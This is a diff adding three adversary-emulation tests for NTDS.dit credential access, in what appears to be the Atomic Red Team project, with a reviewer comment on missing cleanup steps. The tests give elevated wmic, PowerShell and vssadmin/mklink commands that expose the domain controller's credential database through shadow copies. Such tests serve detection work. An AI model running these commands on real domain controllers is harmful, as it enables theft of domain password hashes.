diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index cebadf37..e4f467af 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -176,6 +176,9 @@ credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c6
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with NTDS.dit,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
+credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
+credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
+credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 73cc639d..5d64bb8f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -408,6 +408,9 @@ credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c6
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with NTDS.dit,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
+credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
+credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
+credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
credential-access,T1040,Network Sniffing,4,Packet Capture PowerShell,2bf62970-013a-4c74-b0a8-64030874e89a,powershell
credential-access,T1003,OS Credential Dumping,1,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index f844b414..7a372883 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -390,6 +390,9 @@
- Atomic Test #1: Create Volume Shadow Copy with NTDS.dit [windows]
- Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
- Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
+ - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
+ - Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
+ - Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- Atomic Test #2: Packet Capture macOS [macos]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 6c42e8a4..233977fd 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -845,6 +845,9 @@
- Atomic Test #1: Create Volume Shadow Copy with NTDS.dit [windows]
- Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
- Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
+ - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
+ - Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
+ - Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Packet Capture PowerShell [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 2b744d57..3e0b7db6 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -18176,12 +18176,14 @@ credential-access:
elevation_required: true
- name: Copy NTDS.dit from Volume Shadow Copy
auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03
- description: "This test is intended to be run on a domain Controller.\n\nThe
- Active Directory database NTDS.dit may be dumped by copying it from a Volume
- Shadow Copy.\n\nThis test requires steps taken in the test \"Create Volume
- Shadow Copy with NTDS.dit\".\nA successful test also requires the export of
- the SYSTEM Registry hive. \nThis test must be executed on a Windows Domain
- Controller.\n"
+ description: |
+ This test is intended to be run on a domain Controller.
+
+ The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+ This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
+ A successful test also requires the export of the SYSTEM Registry hive.
+ This test must be executed on a Windows Domain Controller.
supported_platforms:
- windows
input_arguments:
@@ -18249,6 +18251,71 @@ credential-access:
'
name: command_prompt
elevation_required: true
+ - name: Create Volume Shadow Copy with WMI
+ auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da
+ description: |
+ This test is intended to be run on a domain Controller.
+
+ The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+ supported_platforms:
+ - windows
+ input_arguments:
+ drive_letter:
+ description: Drive letter to source VSC (including colon)
+ type: String
+ default: 'C:'
+ dependencies:
+ - description: Target must be a Domain Controller
+ prereq_command: reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v
+ ProductType | findstr LanmanNT
+ get_prereq_command: echo Sorry, Promoting this machine to a Domain Controller
+ must be done manually
+ executor:
+ command: 'wmic shadowcopy call create Volume=#{drive_letter}
+
+'
+ name: command_prompt
+ elevation_required: true
+ - name: Create Volume Shadow Copy with Powershell
+ auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24
+ description: |
+ This test is intended to be run on a domain Controller.
+
+ The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+ supported_platforms:
+ - windows
+ input_arguments:
+ drive_letter:
+ description: Drive letter to source VSC (including colon)
+ type: String
+ default: 'C:'
+ executor:
+ command: "(gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible')\n"
+ name: powershell
+ elevation_required: true
+ - name: Create Symlink to Volume Shadow Copy
+ auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702
+ description: |
+ This test is intended to be run on a domain Controller.
+
+ The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
+ supported_platforms:
+ - windows
+ input_arguments:
+ drive_letter:
+ description: Drive letter to source VSC (including colon)
+ type: String
+ default: 'C:'
+ symlink_path:
+ description: symlink path
+ type: String
+ default: C:\Temp\vssstore
+ executor:
+ command: |
+ vssadmin.exe create shadow /for=#{drive_letter}
+ mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
+ name: command_prompt
+ elevation_required: true
T1040:
technique:
id: attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529
diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md
index 5fe7fcc8..b46716a0 100644
--- a/atomics/T1003.003/T1003.003.md
+++ b/atomics/T1003.003/T1003.003.md
@@ -20,6 +20,12 @@ The following tools and techniques can be used to enumerate the NTDS file and th
- [Atomic Test #3 - Dump Active Directory Database with NTDSUtil](#atomic-test-3---dump-active-directory-database-with-ntdsutil)
+- [Atomic Test #4 - Create Volume Shadow Copy with WMI](#atomic-test-4---create-volume-shadow-copy-with-wmi)
+
+- [Atomic Test #5 - Create Volume Shadow Copy with Powershell](#atomic-test-5---create-volume-shadow-copy-with-powershell)
+
+- [Atomic Test #6 - Create Symlink to Volume Shadow Copy](#atomic-test-6---create-symlink-to-volume-shadow-copy)
+
@@ -72,7 +78,7 @@ This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
-A successful test also requires the export of the SYSTEM Registry hive.
+A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.
**Supported Platforms:** Windows
@@ -189,4 +195,111 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
+
+
+
+## Atomic Test #4 - Create Volume Shadow Copy with WMI
+This test is intended to be run on a domain Controller.
+
+The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| drive_letter | Drive letter to source VSC (including colon) | String | C:|
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+wmic shadowcopy call create Volume=#{drive_letter}
+```
+
+
+
+
+#### Dependencies: Run with `command_prompt`!
+##### Description: Target must be a Domain Controller
+##### Check Prereq Commands:
+```cmd
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
+```
+##### Get Prereq Commands:
+```cmd
+echo Sorry, Promoting this machine to a Domain Controller must be done manually
+```
+
+
+
+
+
+
+
+## Atomic Test #5 - Create Volume Shadow Copy with Powershell
+This test is intended to be run on a domain Controller.
+
+The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| drive_letter | Drive letter to source VSC (including colon) | String | C:|
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+(gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible')
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #6 - Create Symlink to Volume Shadow Copy
+This test is intended to be run on a domain Controller.
+
+The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| drive_letter | Drive letter to source VSC (including colon) | String | C:|
+| symlink_path | symlink path | String | C:\Temp\vssstore|
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+vssadmin.exe create shadow /for=#{drive_letter}
+mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
+```
+
+
+
+
+
+
diff --git a/atomics/T1003.003/T1003.003.yaml b/atomics/T1003.003/T1003.003.yaml
index 9718e758..6d7938e1 100644
--- a/atomics/T1003.003/T1003.003.yaml
+++ b/atomics/T1003.003/T1003.003.yaml
@@ -35,7 +35,7 @@ atomic_tests:
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
- A successful test also requires the export of the SYSTEM Registry hive.
+ A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.
supported_platforms:
- windows
@@ -111,3 +111,72 @@ atomic_tests:
rmdir /q /s #{output_folder}
name: command_prompt
elevation_required: true
+
+- name: Create Volume Shadow Copy with WMI
+ auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da
+ description: |
+ This test is intended to be run on a domain Controller.
+
+ The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+ supported_platforms:
+ - windows
+ input_arguments:
+ drive_letter:
+ description: Drive letter to source VSC (including colon)
+ type: String
+ default: 'C:'
+ dependencies:
+ - description: |
+ Target must be a Domain Controller
+ prereq_command: |
+ reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
+ get_prereq_command: |
+ echo Sorry, Promoting this machine to a Domain Controller must be done manually
+ executor:
+ command: |
+ wmic shadowcopy call create Volume=#{drive_letter}
+ name: command_prompt
+ elevation_required: true
+
+- name: Create Volume Shadow Copy with Powershell
+ auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24
+ description: |
+ This test is intended to be run on a domain Controller.
+
+ The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+ supported_platforms:
+ - windows
+ input_arguments:
+ drive_letter:
+ description: Drive letter to source VSC (including colon)
+ type: String
+ default: 'C:'
+ executor:
+ command: |
+ (gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible')
+ name: powershell
+ elevation_required: true
+
+- name: Create Symlink to Volume Shadow Copy
+ auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702
+ description: |
+ This test is intended to be run on a domain Controller.
+
+ The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
+ supported_platforms:
+ - windows
+ input_arguments:
+ drive_letter:
+ description: Drive letter to source VSC (including colon)
+ type: String
+ default: 'C:'
+ symlink_path:
+ description: symlink path
+ type: String
+ default: 'C:\Temp\vssstore'
+ executor:
+ command: |
+ vssadmin.exe create shadow /for=#{drive_letter}
+ mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
+ name: command_prompt
+ elevation_required: true
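Review bot: None of the three new tests (the `- name:` entries for WMI, Powershell and Symlink) defines an executor `cleanup_command`, so every run leaves a new shadow copy on the host and the Symlink test also leaves the `#{symlink_path}` directory link behind; the preceding test in this file shows the convention (`rmdir /q /s #{output_folder}`), and at minimum the Symlink test should carry `cleanup_command: rmdir #{symlink_path}` (rmdir removes a directory link without following it), with the created shadow copy handled the same way in all three. The `dependencies:` block checking for a Domain Controller appears only on the WMI test, although the Powershell and Symlink descriptions state the same requirement; copying that block to both keeps the prereq check consistent with the description. The Symlink test's `mklink` line hard-codes `\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1`, which names the copy just created only when no other shadow copy exists on the volume — after tests #1, #4 or #5 have run the link will most likely point at an older copy, so the description should state that assumption or the test should be adjusted to not depend on it. The `atomic_tests:` sequence these entries extend starts outside the hunk.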